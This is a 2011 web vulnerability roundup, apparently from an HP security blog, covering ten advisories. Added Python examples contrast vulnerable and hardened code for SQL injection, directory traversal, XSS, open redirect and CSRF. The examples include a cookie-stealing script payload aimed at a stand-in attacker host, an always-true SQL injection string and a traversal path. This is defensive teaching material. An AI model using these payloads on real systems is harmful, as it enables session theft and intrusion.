Top Ten Web Application Vulnerabilities 4/18/2011 - 5/1/2011

1) PHP 'phar/tar.c' Heap Buffer Overflow Vulnerability

 

PHP is susceptible to a remote heap-based buffer overflow because it fails to perform adequate boundary checks on data it parses from tar-format phar archives. An attacker who can get an affected installation to process a malicious archive can run arbitrary code with the privileges of the PHP process (typically the web server's account); failed attempts will likely crash that process. As of this writing a fix has not yet been released. Contact the vendor for additional information.

 

http://www.securityfocus.com/bid/47545

 

2) HP ProLiant Support Pack Multiple Security Vulnerabilities

 

HP ProLiant Support Pack is susceptible to multiple vulnerabilities, including Cross-Site Scripting, information disclosure, and URI Redirection (open redirect). An attacker could leverage these to steal authentication credentials, redirect users to malicious sites, or obtain information that helps in mounting more damaging attacks. Updates which resolve these issues are available. Contact the vendor for more details.

 

http://www.securityfocus.com/bid/47510

 

3) HP Systems Insight Manager Cross-Site Scripting/Cross-Site Request Forgery

 

HP Systems Insight Manager is susceptible to multiple vulnerabilities, including Cross-Site Scripting and Cross-Site Request Forgery. If exploited, these vulnerabilities could lead to the theft of confidential information and authentication credentials, execution of malicious scripts in the browsers of unsuspecting users, or, through Cross-Site Request Forgery, actions performed in a user's name by abusing the trust the application places in that user's browser. Updates which resolve these vulnerabilities are available. Contact the vendor for further information.

 

http://www.securityfocus.com/bid/47511
http://www.securityfocus.com/bid/47513

 

4) Cisco Unified Communications Manager SQL Injection/Directory Traversal Vulnerabilities

 

Cisco Unified Communications Manager is susceptible to several vulnerabilities, including SQL Injection and Directory Traversal. SQL Injection can give an attacker the ability to read and modify the backend database and, depending on the privileges of the database account, may be used to take complete control of the system. Directory Traversal can be leveraged to write arbitrary files to locations outside the directory the application intended, for instance on top of configuration files or scripts. Updates which resolve these issues are available. Contact the vendor for more details.

 

http://www.securityfocus.com/bid/47605
http://www.securityfocus.com/bid/47608
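The two bug classes named in item 4, shown side by side in vulnerable and hardened form. This is an added example and not code from the bulletin or from Cisco's product: the `users` table, the `/srv/app/uploads` directory and the file names are all made up for illustration, and the database is an in-memory SQLite so it runs offline.

```python
import os
import sqlite3

# Constructed sample database (hypothetical schema, not the product's).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user")])
    return conn

def lookup_roles_vulnerable(conn, name):
    # The client-supplied value is spliced into the statement text, so a
    # quote inside it closes the literal and the rest is parsed as SQL.
    sql = "SELECT role FROM users WHERE name = '" + name + "'"
    return sorted(row[0] for row in conn.execute(sql))

def lookup_roles_safe(conn, name):
    # Parameterised query: the value is bound separately from the statement
    # and can never change the query's structure.
    sql = "SELECT role FROM users WHERE name = ?"
    return sorted(row[0] for row in conn.execute(sql, (name,)))

# Constructed payload: closes the literal and appends an always-true clause,
# which makes the vulnerable query return every row.
SQLI_PAYLOAD = "x' OR '1'='1"

# --- directory traversal ----------------------------------------------------
UPLOAD_DIR = "/srv/app/uploads"   # hypothetical upload root

def naive_upload_path(base_dir, filename):
    # What a vulnerable upload handler does: trust the client-supplied name.
    return os.path.normpath(os.path.join(base_dir, filename))

def safe_upload_path(base_dir, filename):
    """Return the absolute path for filename under base_dir, or raise
    ValueError if the name (via '..' or an absolute path) would land
    anywhere outside base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, filename))
    # commonpath compares whole path components, so "/srv/app/uploads-old"
    # is not mistaken for something inside "/srv/app/uploads".
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes %s: %r" % (base, filename))
    return target

def traversal_blocked(base_dir, filename):
    try:
        safe_upload_path(base_dir, filename)
        return False
    except ValueError:
        return True

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_roles_vulnerable(db, SQLI_PAYLOAD))   # ['admin', 'user']
    print("safe:      ", lookup_roles_safe(db, SQLI_PAYLOAD))         # []
    print(naive_upload_path(UPLOAD_DIR, "../../../etc/cron.d/job"))    # /etc/cron.d/job
    print(traversal_blocked(UPLOAD_DIR, "../../../etc/cron.d/job"))    # True
```

The path check resolves symlinks before comparing, which matters when the upload root itself can contain attacker-created links; a string prefix test alone would not catch that, and would also accept sibling directories sharing the prefix.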

 

5) Oracle JD Edwards EnterpriseOne Multiple Cross-Site Scripting Vulnerabilities

 

Oracle JD Edwards EnterpriseOne is susceptible to multiple Cross-Site Scripting vulnerabilities. Cross-Site Scripting can be exploited to execute script code in the browser of an unsuspecting user, in the context of the affected site, and to steal cookie-based authentication credentials where the session cookie is not marked HttpOnly. Updates which resolve these vulnerabilities are available. Contact the vendor for additional information.

 

http://www.securityfocus.com/bid/47479

 

6) HP SiteScope Cross-Site Scripting/HTML Injection Vulnerabilities

 

HP SiteScope is susceptible to Cross-Site Scripting and HTML Injection vulnerabilities. Successful exploitation could be used to deface pages the site serves, steal authentication credentials, or execute malicious scripts in the browsers of unsuspecting users. Updates which resolve these vulnerabilities are available. Contact the vendor for more details.

 

http://www.securityfocus.com/bid/47554

 

7) RSA Data Loss Prevention (DLP) Enterprise Manager Cross-Site Scripting Vulnerability

 

RSA Data Loss Prevention (DLP) Enterprise Manager is susceptible to Cross-Site Scripting. An attacker can leverage it to execute script code in the browsers of unsuspecting users in the context of the affected application, possibly leading to theft of authentication credentials and other attacks. Updates which resolve this issue are available. Contact the vendor for additional details.

 

http://www.securityfocus.com/bid/47642

 

8) Oracle Sun GlassFish/Java System Application Server Remote Authentication Bypass Vulnerability

 

Oracle Sun GlassFish/Java System Application Server is susceptible to a remote authentication bypass vulnerability which could allow a remote attacker to perform actions that should require authentication. Updates which resolve this issue are available. Contact the vendor for further details.

 

http://www.securityfocus.com/bid/47438

 

9) CA Arcot WebFort Versatile Authentication Server Cross-Site Scripting/URI Redirection Vulnerabilities

 

CA Arcot WebFort Versatile Authentication Server is susceptible to Cross-Site Scripting and URI Redirection vulnerabilities. If the Cross-Site Scripting issue is successfully exploited, arbitrary script code can be executed in the browsers of unsuspecting users in the context of the affected site. Successful exploitation of the URI Redirection vulnerability could give an attacker the means to redirect users to malicious sites, aiding in phishing attacks. Updates which resolve these issues are available. Contact the vendor for more information.

 

http://www.securityfocus.com/bid/47587
http://www.securityfocus.com/bid/47588
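The two issues in item 9 are the same classes that recur in items 2, 3, 5, 6 and 7, so one added example covers them all: a reflected Cross-Site Scripting sink with and without output encoding, the cookie flag that blunts the credential-theft payload, and a redirect-target check of the kind that closes a URI Redirection hole. This is illustrative code written for this page, not the vendor's; the `portal.example.com` hostname, the `attacker.example` host, the `sid` cookie name and the payload are all constructed.

```python
import html
from urllib.parse import urlsplit

# Constructed payload: ships the document's cookies to an attacker-run host.
XSS_PAYLOAD = ("<script>new Image().src='https://attacker.example/c?'"
               "+document.cookie</script>")

def render_results_vulnerable(query):
    # Reflects the request parameter verbatim into the page body.
    return "<h2>Results for " + query + "</h2>"

def render_results_safe(query):
    # Encodes <, >, &, " and ' so the value is displayed as text rather than
    # parsed as markup. (Attribute and JavaScript contexts need their own
    # encoders; this is the HTML-body case.)
    return "<h2>Results for " + html.escape(query, quote=True) + "</h2>"

def session_cookie_header(value):
    # HttpOnly keeps document.cookie from exposing the session id to injected
    # script; Secure stops the browser sending it over plain HTTP.
    return "Set-Cookie: sid=%s; Path=/; HttpOnly; Secure" % value

# --- URI redirection --------------------------------------------------------
ALLOWED_HOSTS = {"portal.example.com"}   # hypothetical hostnames the site owns

def is_safe_redirect(target, allowed_hosts=ALLOWED_HOSTS):
    """True only for same-site destinations: a site-relative path, or an
    http(s) URL whose host is one we own."""
    if not target or "\\" in target:
        # Browsers treat a backslash like a slash ("/\\evil.example" becomes
        # "//evil.example"), so reject it rather than try to normalise it.
        return False
    parts = urlsplit(target)
    if parts.scheme:
        # Absolute URL: only http(s), and only to our own host. .hostname
        # drops userinfo and port, so "http://portal.example.com@evil.example/"
        # resolves to evil.example and is rejected.
        return (parts.scheme in ("http", "https")
                and (parts.hostname or "").lower() in allowed_hosts)
    if parts.netloc:
        # Protocol-relative "//evil.example/..." inherits our scheme but not
        # our host.
        return False
    return target.startswith("/")

def login_redirect(next_param, default="/home"):
    # Where to send the user after login: the requested page if it is
    # same-site, otherwise a fixed landing page.
    return next_param if is_safe_redirect(next_param) else default

if __name__ == "__main__":
    print(render_results_vulnerable(XSS_PAYLOAD))   # script tag intact
    print(render_results_safe(XSS_PAYLOAD))         # &lt;script&gt;...
    print(login_redirect("//attacker.example/login"))          # /home
    print(login_redirect("https://portal.example.com/account"))  # https://portal.example.com/account
```

Encoding at output time is the fix for the Cross-Site Scripting and HTML Injection items; HttpOnly is defence in depth that limits what a successful injection can steal, not a substitute. For redirects, an allow-list of destinations is stronger still when the set of legitimate targets is small.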

 

10) HP Insight Control Cross-Site Request Forgery

 

HP Insight Control is susceptible to Cross-Site Request Forgery. Cross-Site Request Forgery abuses the trust a web application places in a user's browser: because the browser automatically attaches the user's session cookie to requests for a site the user is logged in to, a request triggered from an attacker-controlled page is carried out with the user's authority, and any state-changing function the application exposes to that user can be abused. Updates which resolve this vulnerability are available. Contact the vendor for additional information.

 

http://www.securityfocus.com/bid/47524
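The mechanism described in item 10 (and the CSRF half of item 3), as an added example that is not part of the bulletin or of HP's product: a handler that trusts the session cookie alone, the same handler guarded by a session-bound anti-forgery token, and the request the victim's browser submits from an attacker's page. The session store, the `sid` cookie name, the `change_email` action and the HMAC token scheme are all assumptions made for illustration.

```python
import hashlib
import hmac
import secrets

# Per-deployment secret (hypothetical; a real application loads it from config).
SECRET_KEY = secrets.token_bytes(32)

def fresh_sessions():
    # Constructed server-side session store: cookie value -> session data.
    return {"s3ss10n-alice": {"user": "alice", "email": "alice@example.com"}}

def make_csrf_token(session_id):
    # Binding the token to the session id means a token the attacker obtains
    # for their own session is useless against anyone else's.
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def verify_csrf_token(session_id, token):
    if not isinstance(token, str) or not token:
        return False
    return hmac.compare_digest(make_csrf_token(session_id), token)

def change_email_vulnerable(sessions, request):
    """Authorises on the session cookie alone. `request` is a dict standing in
    for a framework request object: {'cookies': {...}, 'form': {...}}."""
    sid = request["cookies"].get("sid")
    if sid not in sessions:
        return 401, "not logged in"
    sessions[sid]["email"] = request["form"]["email"]
    return 200, "email updated"

def change_email_safe(sessions, request):
    """Also requires a token that only a page served by this site to this
    session could have carried."""
    sid = request["cookies"].get("sid")
    if sid not in sessions:
        return 401, "not logged in"
    if not verify_csrf_token(sid, request["form"].get("csrf_token")):
        return 403, "missing or invalid CSRF token"
    sessions[sid]["email"] = request["form"]["email"]
    return 200, "email updated"

def forged_request():
    # What the server sees when the victim's browser auto-submits a form from
    # the attacker's page: the victim's cookie is attached by the browser, but
    # the attacker could not read the token embedded in the victim's pages.
    return {"cookies": {"sid": "s3ss10n-alice"},
            "form": {"email": "attacker@attacker.example"}}

def legitimate_request(session_id):
    # A submission from the site's own form, which carried the token.
    return {"cookies": {"sid": session_id},
            "form": {"email": "alice@newmail.example",
                     "csrf_token": make_csrf_token(session_id)}}

if __name__ == "__main__":
    s = fresh_sessions()
    print(change_email_vulnerable(s, forged_request()), s)   # (200, ...) email hijacked
    s = fresh_sessions()
    print(change_email_safe(s, forged_request()), s)         # (403, ...) unchanged
    print(change_email_safe(s, legitimate_request("s3ss10n-alice")))  # (200, ...)
```

The token must be carried in the form body or a custom header, never only in a cookie, since a cookie is exactly what the browser would attach to the forged request. Checking the Origin or Referer header and marking the session cookie SameSite are worthwhile additional layers, but the token check is what makes the handler stand on its own.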

The opinions expressed above are the personal opinions of the authors, not of HP. By using this site, you accept the Terms of Use and Rules of Participation.